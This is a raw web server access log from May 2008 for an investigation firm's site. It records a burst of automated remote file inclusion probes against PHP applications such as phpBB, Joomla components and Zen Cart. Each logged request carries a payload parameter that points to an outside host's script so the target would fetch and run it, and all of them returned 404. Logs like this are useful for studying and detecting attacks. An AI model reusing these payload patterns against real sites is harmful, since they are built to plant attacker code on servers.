217.31.58.188 - - [14/May/2008:22:18:23 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:18:28 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:18:28 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:33 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:18:33 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:18:48 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:18:48 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:19:00 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:19:00 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:19:01 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:06 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:07 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:07 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
203.146.251.123 - - [14/May/2008:22:19:09 -0700] "GET /logs/access_080429.log/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
203.146.251.123 - - [14/May/2008:22:19:10 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
203.146.251.123 - - [14/May/2008:22:19:10 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:17 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:18 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:19:18 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
219.94.128.57 - - [14/May/2008:22:19:19 -0700] "GET /logs/access_080429.log/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
219.94.128.57 - - [14/May/2008:22:19:20 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:19:21 -0700] "GET /logs/access_080503.log/convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:19:22 -0700] "GET /convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:19:22 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
124.0.110.130 - - [14/May/2008:22:19:29 -0700] "GET /logs/template.php?goto=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
124.0.110.130 - - [14/May/2008:22:19:29 -0700] "GET /template.php?goto=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:19:35 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:19:35 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:19:41 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:19:44 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:19:51 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:19:51 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:19:56 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:19:56 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:20:02 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:20:02 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:20:02 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:20:15 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:20:16 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:20:16 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:20:20 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:20:20 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:20:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:20:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
87.244.220.2 - - [14/May/2008:22:20:26 -0700] "GET /logs/access_080501.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:20:32 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:20:36 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:20:37 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:20:37 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:20:46 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:20:46 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
80.93.56.68 - - [14/May/2008:22:20:52 -0700] "GET /logs/access_080430.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
80.93.56.68 - - [14/May/2008:22:20:52 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:20:52 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:20:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
80.93.56.68 - - [14/May/2008:22:20:53 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pskovclub.ru/rec/images/uid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:20:53 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:20:53 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:20:55 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.jainvestigation.com"
87.244.220.2 - - [14/May/2008:22:20:56 -0700] "GET /logs/access_080429.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.244.220.2 - - [14/May/2008:22:20:56 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:20:57 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:21:10 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:21:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:21:24 -0700] "GET /logs/access_080406.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:21:25 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
202.47.247.136 - - [14/May/2008:22:21:26 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.elitelibri.com/pages/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:21:29 -0700] "GET /order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:21:30 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:21:30 -0700] "GET /logs/order/login.php?svr_rootscript=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:21:30 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:21:30 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:21:30 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:21:38 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:21:38 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:21:38 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:21:55 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.234.171.106 - - [14/May/2008:22:22:07 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
195.234.171.106 - - [14/May/2008:22:22:07 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:22:12 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:22:12 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:22:12 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:22:13 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:22:33 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:22:34 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:22:34 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:22:49 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:22:49 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:22:49 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:22:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:22:58 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:05 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:05 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:06 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:23:09 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:23:09 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:23:17 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:23:17 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "jainvestigation.com"
202.181.99.12 - - [14/May/2008:22:23:24 -0700] "GET /logs/access.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:26 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:26 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:23:27 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:23:28 -0700] "GET /logs/access_080429.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:23:29 -0700] "GET /logs/access_080429.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:23:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
88.84.149.101 - - [14/May/2008:22:23:29 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:23:30 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
